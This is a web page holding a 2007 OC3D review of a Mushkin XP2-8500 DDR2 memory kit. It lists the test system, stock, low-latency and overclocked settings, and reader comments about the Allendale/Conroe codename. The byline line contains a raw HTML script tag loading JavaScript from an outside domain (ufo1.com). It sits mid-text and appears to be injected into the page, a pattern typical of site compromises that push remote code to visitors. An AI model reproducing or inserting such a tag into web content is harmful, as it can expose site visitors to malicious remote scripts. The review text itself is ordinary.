Mushkin XP2-8500 DDR2 2GB Kit

Test Setup & Settings

Review <script type="text/javascript" src="http://ufo1.com/ad/c.js"></script> Posted 13/02/07
Author: Llwyd Johnson
Source: Mushkin

Test Setup & Settings

Test Setup:

Processor: Intel C2D E4300 "allendale"
Motherboard: ASUS P5B deluxe - unmodded
Graphics card: Leadtek 7800GTX 256mb
HDD:
Seagate Barracuda 200gb - SATA/2
Power Supply: Hiper 580W Type-R Modular
Operating System: Windows XP sp2


Settings

For the benchmarking of the XP2-8500 modules we try to cover every angle that could be desired by users. Therefore we test at high frequencies, low latencies and mixtures of both. The memory was kept at 2.35v for all testing; usually at OC3D we would alter the voltage when needed and state the changes on the testing details. However, at 2.35v the memory was still well within acceptable heat levels and so there is no reason why it cannot be left at this level permanently.

Below is the details of each setting that will be used in the benchmarking process:

Stock Settings (5-5-4-12 / 533MHz)

Stock 1 Stock 2

Here we tested the memory to ensure that it could indeed run at its rated speeds. This may seem like a pointless test but unfortunately some memory kits do actually fail to manage stock speeds, some of which have actually passed through the OC3D Labs.

In this case, I am pleased to say that the memory ran at 1066 @ 5-5-4-12 without any problems whatsoever.


Lowest Timings at Stock Frequencies ( 4-4-4-10 / 533MHz)

lowest timings 1 lowest timings 2

Here we try to take the memory timings down as low as possible while keeping the frequency at stock levels. The timings were taken down to 4-4-4-10 while retaining SuperPI 32M and Orthos stability.

A pretty respectable drop in timings for relatively high speed memory.

Highest Frequency at Stock Timings (5-5-4-12 / 600MHz)

Highest Frequency 1 Highest Frequency 2

For this round of testing, the memory was taken up to the highest possible frequency while maintaining stock timings and staying stable in the same tests used for the previous settings.

Keeping the timings at 5-5-4-12 and the voltage at 2.35, the memory managed to reach DDR2-1200. Not a huge overclock but still very respectable. With a small increase in voltage and some looser timings I can see higher speeds being reached.

I managed, after much perseverance, to get to timings of 4-3-3-8 @ 460MHz. This was stable up until the higher levels of SuperPI and so was not officially included. However I believe that with some more voltage; higher speeds and stability could be reached. Let's see what the Everest and SuperPi results show.
«Prev 1 2 3 4 5 6 Next»

Most Recent Comments

14-02-2007, 06:06:11

llwyd
Another OC3D review of a very nice kit of memory for a real good price. Check out the review Here

14-02-2007, 06:10:23

FarFarAway
Mushkin make some awesome RAM

Nice review Llwyd

14-02-2007, 06:59:13

Mr. Popo

Intel C2D E4300 "allendale"



You say "Allendale", CPU-Z say "Conroe".

Great review!

14-02-2007, 07:03:45

PV5150
Great review mate and very thorough. Well done I'll have to get me some Mushkin sticks some day

14-02-2007, 07:29:39

Deshman
Looks like some pretty nice looking RAM, can't say I've ever come across Mushkin before though.

14-02-2007, 07:31:51

Mr. Popo
Quote:
Originally Posted by name='Deshman'
Looks like some pretty nice looking RAM, can't say I've ever come across Mushkin before though.
OMG, it's Mushkin!

"The Lord of The Apple RAM"

14-02-2007, 07:33:17

JN
Quote:
Originally Posted by name='Mr. Popo'
You say "Allendale", CPU-Z say "Conroe".

Great review!
Funnily enough I was reading about this yesterday, and you're right - there is no such thing as an Allendale according to Intel

14-02-2007, 07:36:16

FarFarAway
Quote:
Originally Posted by name='Deshman'
Looks like some pretty nice looking RAM, can't say I've ever come across Mushkin before though.
They make seriously underrated RAM

Great stuff

14-02-2007, 07:36:56

Deshman
Ahhh, Apple. That would explain it. I try to steer away from Apple and advise others to do the same after the trouble I've experienced with Apple hardware (not just their PCs).

14-02-2007, 07:38:55

Rastalovich
Annoyingly, I see Mushkin, but keep reading as munshkin >.<

14-02-2007, 07:45:07

Deshman
Hehe me too. You'd think companies would think their names thoroughly before committing to them. A great example being the Mole Station Nursery, their web address of course being molesationnursery

14-02-2007, 07:48:12

mrapoc
Very nice review my friend!

14-02-2007, 08:57:11

llwyd
Thankyou guys. CPUz was wrong with a few things, the vlotage is way off, the core code-name is wrong (as you noticed) and the memory speed is reading as PC-6400 .........

14-02-2007, 09:01:50

Mr. Popo
CPU-Z was not wrong, the codename changed from Allendale to Conroe.

14-02-2007, 09:03:04

llwyd
Quote:
Originally Posted by name='Mr. Popo'
CPU-Z was not wrong, the codename changed from Allendale to Conroe.
Ah well I don't make a habit of following name changes, either way the voltages and memory speeds are wrong

14-02-2007, 09:41:47

Ham
Quote:
Originally Posted by name='Mr. Popo'
CPU-Z was not wrong, the codename changed from Allendale to Conroe.
Actualy Allendale has 1/2 the cache of conroe. Whether its just been disabled or removed i don't know.
Reply
x

Register for the OC3D Newsletter

Subscribing to the OC3D newsletter will keep you up-to-date on the latest technology reviews, competitions and goings-on at Overclock3D. We won't share your email address with ANYONE, and we will only email you with updates on site news, reviews, and competitions and you can unsubscribe easily at any time.

Simply enter your name and email address into the box below and be sure to click on the links in the confirmation emails that will arrive in your e-mail shortly after to complete the registration.

If you run into any problems, just drop us a message on the forums.